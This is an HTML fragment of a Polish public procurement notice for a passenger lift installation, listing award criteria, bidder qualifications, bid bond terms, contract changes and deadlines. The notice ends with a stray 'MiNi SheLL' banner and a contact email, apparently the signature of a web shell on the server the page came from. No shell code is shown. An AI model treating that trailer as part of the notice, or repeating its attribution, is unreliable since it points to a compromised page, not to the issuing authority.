<span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert: Zamawiający dokona oceny ofert złożonych w postępowaniu na podstawie kryteriów oceny ofert.<br/>Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu. Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z<br/>poniższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolności techniczne lub zawodowe:<br/>O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy posiadają wiedzę i doświadczenie oraz<br/>zdolności zawodowe, zapewniające należyte wykonanie zamówienia. Zamawiający uzna warunek za spełniony, jeżeli<br/>Wykonawca ubiegający się o udzielenie zamówienia publicznego:<br/>a) wykaże, że wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują, w okresie ostatnich 5 lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, min. jedną<br/>robotę budowlaną o wartości co najmniej 200.000,00 zł brutto przedmiotem której było wykonanie robót w zakresie dostawy i<br/>montażu dźwigu osobowego lub windy,<br/>b) wykaże, że dysponuje osobami zdolnymi do wykonywania zamówienia, które będą uczestniczyć w wykonywaniu<br/>zamówienia, tj. posiadającymi prawo do wykonywania samodzielnych funkcji technicznych w budownictwie zgodnie z<br/>poniższym wyszczególnieniem:<br/>- co najmniej jedną osobą, która będzie pełniła funkcję kierownika budowy, posiadającą uprawnienia budowlane w<br/>specjalności konstrukcyjno – budowlanej bez ograniczeń,<br/>- co najmniej jedną osobą, która będzie pełniła funkcję kierownika robót, posiadającą uprawnienia budowlane do kierowania<br/>robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych bez ograniczeń.<br/>Ocena spełniania ww. warunku udziału w postępowaniu zostanie dokonana przez Zamawiającego (tylko wobec<br/>Wykonawcy, którego oferta została najwyżej oceniona) w oparciu o informacje zawarte:<br/>- w oświadczeniu o spełnianiu warunków udziału w postępowaniu,<br/>- w wykazie osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych<br/>za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;<br/>Przez ww. uprawnienia budowlane Zamawiający rozumie uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca<br/>1994 r. Prawo budowlane lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio<br/>obowiązujących przepisów prawa, lub odpowiednich przepisów obowiązujących na terenie kraju, w którym Wykonawca ma<br/>siedzibę lub miejsce zamieszkania, uznanych przez właściwy organ, zgodnie z ustawą z dnia 22 grudnia 2015 r. o zasadach<br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.<br/>W przypadku osób, które są obywatelami państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej oraz państw<br/>członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) – stron umowy o Europejskim Obszarze<br/>Gospodarczym (w rozumieniu art. 4a ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz<br/>inżynierów budownictwa), osoby wyznaczone do realizacji zamówienia posiadają uprawnienia budowlane do kierowania<br/>robotami budowlanymi, wyszczególnione wyżej, jeżeli:<br/>- nabyły kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznacznej wykonywaniu samodzielnych<br/>funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej, odpowiadające posiadaniu uprawnień<br/>budowlanych do kierowania robotami budowlanymi, oraz<br/>- posiadają odpowiednią decyzję o uznaniu kwalifikacji zawodowych lub w przypadku braku decyzji o uznaniu kwalifikacji<br/>zawodowych zostały spełnione w stosunku do tych osób wymagania, o których mowa w art. 20a ust. 2-6 ustawy z dnia 15<br/>grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa, dotyczące świadczenia usług<br/>transgranicznych.<br/>Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca<br/>nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności<br/>zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy<br/>może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenie<br/>Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu<br/>ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. z 2023 r. poz. 1689), z innym Wykonawcą, który złożył<br/>odrębną ofertę lub ofertę częściową, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego Wykonawcy należącego do tej<br/>samej grupy kapitałowej – Załącznik do SWZ;<br/>2) odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) w<br/>celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, min. jedną robotę budowlaną o wartości co najmniej 200.000,00 zł brutto przedmiotem której było<br/>wykonanie robót w zakresie dostawy i montażu dźwigu osobowego lub windy wraz z podaniem ich rodzaju, wartości, daty i miejsca<br/>wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty<br/>budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest<br/>w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>b) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, tj.<br/>- co najmniej jedną osobą, która będzie pełniła funkcję kierownika budowy, posiadającą uprawnienia budowlane w specjalności<br/>konstrukcyjno – budowlanej bez ograniczeń,<br/>- co najmniej jedną osobą, która będzie pełniła funkcję kierownika robót, posiadającą uprawnienia budowlane do kierowania<br/>robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez<br/>ograniczeń.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>2) w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców:<br/>a) pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia,<br/>b) oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu składa każdy z<br/>Wykonawców,<br/>c) oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy –<br/>zgodnie z Załącznikiem do SWZ;<br/>3) w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby Wykonawca przedstawia także:<br/>a) oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz<br/>spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby;<br/>b) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów – zgodnie z Załącznikiem do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 6.4.1) Informacje dotyczące wadium:<br/>1. Zamawiający wymaga wniesienia wadium przed upływem terminu składania ofert w wysokości<br/>7 600,00 zł (słownie: siedem tysięcy sześćset złotych 00/100).<br/>2. Wadium może być wniesione w jednej lub kilku następujących formach:<br/>1) pieniądzu – przelewem na rachunek Zamawiającego – oznacza to, że w terminie składania ofert wniesione wadium musi<br/>znaleźć się na rachunku Zamawiającego;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2023 r. poz. 462).<br/>3. Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert.<br/>4. Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Zamawiającego w Santander Bank Polska<br/>Spółka Akcyjna nr 77 1090 1841 0000 0001 5490 9623. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w<br/>podanym terminie znajdzie się na rachunku bankowym Zamawiającego.<br/>5. Oferta Wykonawcy, który nie wniesie wadium, lub wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium<br/>nieprzerwanie do upływu terminu związania ofertą, lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art.<br/>98 ust. 2 pkt 3, zostanie odrzucona.<br/>6. Wadium wnoszone w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczenia udzielanego przez Polską<br/>Agencję Rozwoju Przedsiębiorczości, należy złożyć w formie oryginału w postaci elektronicznej.<br/>7. Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji Gwaranta. Gwarancja musi<br/>być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w<br/>sposób umożliwiający jego identyfikację (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe,<br/>na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do<br/>wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 Prawa Zamówień publicznych.<br/>Gwarancja musi umożliwić skuteczne zaspokojenie roszczeń Zamawiającego w razie spełnienia przesłanek zatrzymania<br/>wadium.<br/>8. Zasady zwrotu oraz okoliczności zatrzymania wadium określa ustawa Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty;<br/>2) przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia;<br/>3) w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepodleganiu wykluczeniu<br/>oraz spełnianiu warunków udziału w postępowaniu, o których mowa w Rozdziale XV ust. 1 SWZ, składa wraz z ofertą każdy<br/>z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/>4) warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej jest spełniony, jeżeli<br/>co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada wymagane uprawnienia i<br/>zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane;<br/>5) w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych Wykonawców, którzy wykonają roboty<br/>budowlane lub usługi, do realizacji których te zdolności są wymagane;<br/>6) w przypadku, o którym mowa w ust. 4 (uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej)<br/>i ust. 5 (warunki dotyczące wykształcenia, kwalifikacji zawodowych lub doświadczenia) Wykonawcy wspólnie ubiegający się<br/>o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi<br/>wykonają poszczególni Wykonawcy. W przypadku, gdy ofertę składa spółka cywilna, a pełen zakres prac wykonają<br/>wspólnicy wspólnie w ramach umowy spółki oświadczenie powinno potwierdzać ten fakt. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje następujące okoliczności zmiany zawartej umowy, tj. w przypadku: Konieczności zmiany terminu<br/>wykonania przedmiotu umowy, w przypadku gdy: 1) zmiana terminu realizacji zamówienia spowodowana w przypadku: a)<br/>zaistnienia siły wyższej uniemożliwiającej prowadzenie robót budowlanych zgodnie z dokumentacją projektową i<br/>harmonogramem,<br/>b) prowadzenia wykopalisk archeologicznych w związku, ze znaleziskami w trakcie prowadzenia robót, c) odkrycia na<br/>terenie budowy broni, bomb, niewybuchów lub innych materiałów wybuchowych oraz przedmiotów o znaczeniu<br/>archeologicznym i historycznym, d) w przypadku dokonanych przez Zamawiającego zmian w dokumentacji technicznej -<br/>termin zakończenia może zostać zmieniony o czas wynikający z dokonania zmian uzasadniający zmianę terminu, e) w<br/>przypadku działania osób trzecich, które to działania uniemożliwiają rozpoczęcie, wykonanie lub kontynuacje robót, f) jeżeli<br/>wystąpią znacząco odmienne od przyjętych w dokumentacji projektowej warunki geologiczne, g) wykrycia instalacji,<br/>urządzeń lub budowli podziemnych nie ujętych w dokumentacji projektowej i nie zinwentaryzowanych przez właścicieli i<br/>gestorów instalacji i urządzeń, a wymagających przebudowy w związku z wykonaniem przedmiotu umowy;<br/>h) zmiany przepisów prawa, mających wpływ na termin wykonania robót lub sposób prowadzenia robót, termin zostanie<br/>wydłużony tylko o czas trwania przeszkody, i) wystąpienia wyjątkowo niesprzyjających warunków pogodowych (np.<br/>intensywne wielodniowe opady deszczu lub śniegu, ujemne temperatury, itp.) uniemożliwiających prawidłowe prowadzenie<br/>robót zgodnie z przyjętą technologią, wiedzą i sztuką budowlaną oraz Specyfikacją Techniczną Wykonania i Odbioru Robót,<br/>o której mowa w § 1 ust. 3 pkt 2, utrzymujących się przez kolejne trzy dni, potwierdzonych wpisem do dziennika budowy<br/>przez kierownictwo budowy oraz Inspektora Nadzoru,<br/>j) wystąpienia okoliczności, których Strony nie mogły przewidzieć w chwili zawierania umowy, a jednocześnie za<br/>wystąpienie tych okoliczności nie ponosi odpowiedzialności Wykonawca. W szczególności zmianę terminu wykonania<br/>przedmiotu umowy może uzasadniać przekroczenie terminów określonych w Kodeksie postępowania administracyjnego dla<br/>procedur administracyjnych lub innych terminów określonych w przepisach prawa mających wpływ na czas realizacji<br/>przedmiotu umowy,<br/>k) wydłużonego czasu oczekiwania na dostawę materiałów budowlanych przekraczającego 3 tygodnie, l) w przypadku<br/>wystąpienia konieczności wykonania robót dodatkowych, m) zmiana terminu realizacji nie będzie powodowała zwiększenia wynagrodzenia Wykonawcy w przypadku wystąpienia konieczności wykonania robót dodatkowych. 2) Zmiany osobowe: a)<br/>zmiany osób realizujących zamówienie, pod warunkiem, że osoby te będą spełniały wymagania określone w SWZ, b)<br/>zmiany osób reprezentujących w przypadku zmian organizacyjnych, c) zmiany Podwykonawcy, przy pomocy którego<br/>Wykonawca wykonuje przedmiot umowy; zmiana jest możliwa tylko w przypadku, gdy nowy podwykonawca posiada<br/>tożsamą wiedzę i doświadczenie zawodowe, potencjał techniczny oraz osoby zdolne do wykonania Zamówienia a także jest<br/>w sytuacji ekonomiczniej i finansowej, nie gorszej niż dotychczasowy podwykonawca, d) zmiana kierownika budowy na<br/>wniosek Zamawiającego, jeżeli uzna, że nie wykonuje on należycie swoich obowiązków. Wykonawca zobowiązany jest<br/>wówczas dokonać zmiany kierownika budowy (przy zachowaniu wymagań określonych w SWZ) w terminie nie dłuższym niż<br/>14 dni od daty złożenia wniosku przez Zamawiającego. 3) Inne zmiany: a) Zamawiający zastrzega sobie prawo do<br/>wprowadzenia zmian w harmonogramie rzeczowo–finansowym, b) gdy zajdzie konieczność powierzenia realizacji części<br/>przedmiotu zamówienia podwykonawcy niewskazanemu w ofercie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-16 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/powiat-legionowski/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-16 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Podstawy wykluczenia cd:<br/>Zamawiający wykluczy również z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na<br/>podstawie ustawy Pzp - na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z<br/>2023 r. poz. 1497 ze zm.):<br/>1) Wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3 ww. ustawy;<br/>2) Wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r.<br/>o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz.U. z 2023 r. poz. 1124) jest osoba wymieniona w<br/>wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim<br/>beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu<br/>na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ww. ustawy;<br/>3) Wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29<br/>września 1994 r. o rachunkowości (Dz.U. z 2023 r. poz. 120) jest podmiot wymieniony w wykazach określonych w<br/>rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24<br/>lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu<br/>środka, o którym mowa w art. 1 pkt 3 ww. ustawy.

Creat By MiNi SheLL
Email: jattceo@gmail.com